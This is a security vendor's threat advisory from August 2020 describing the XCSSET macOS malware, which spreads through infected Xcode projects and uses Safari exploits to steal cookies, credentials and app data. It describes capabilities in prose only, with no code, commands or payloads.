XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits

By Trend Micro Mac Threat Response and Mobile Research Team

August 17, 2020

We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developerís Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.

This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.

This blog will summarize the findings of this threat, while its accompanying technical brief contains the full details of this attack. We detected the entry threat as TrojanSpy.MacOS.XCSSET.A and its command and control (C&C) related files as Backdoor.MacOS.XCSSET.A.

This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.

Once present on an affected system, XCSSET is capable of the following behavior:

  • Using exploits, it abuses the existing the Safari and other installed browsers to steal user data. In particular, it
    • Uses a vulnerability to read and dump Safari cookies
    • Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack
  • It steals information from the userís Evernote, Notes, Skype, Telegram, QQ ,and WeChat apps
  • It takes screenshots of the userís current screen
  • It uploads files from the affected machines to the attackerís specified server
  • It encrypts files and shows a ransom note, if commanded by the server

The UXSS attack is theoretically capable of modifying almost every part of the userís browser experience as arbitrary JavaScript-injected code. These modifications include:

  • Modifying displayed websites
  • Modifying /replacing Bitcoin/cryptocurrency addresses
  • Stealing amoCRM, Apple ID, Google, Paypal, SIPMarket, and Yandex credentials
  • Stealing credit card information from the Apple Store
  • Blocking the user from changing passwords but also stealing newly modified passwords
  • Capturing screenshots of certain accessed sites

The method of distribution used can only be described as clever. Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.

Further details of this attack may be found in its related technical brief.

Terms of Use | Copyright © 2002 - 2020 CONSTITUENTWORKS SM  CORPORATION. All rights reserved. | Privacy Statement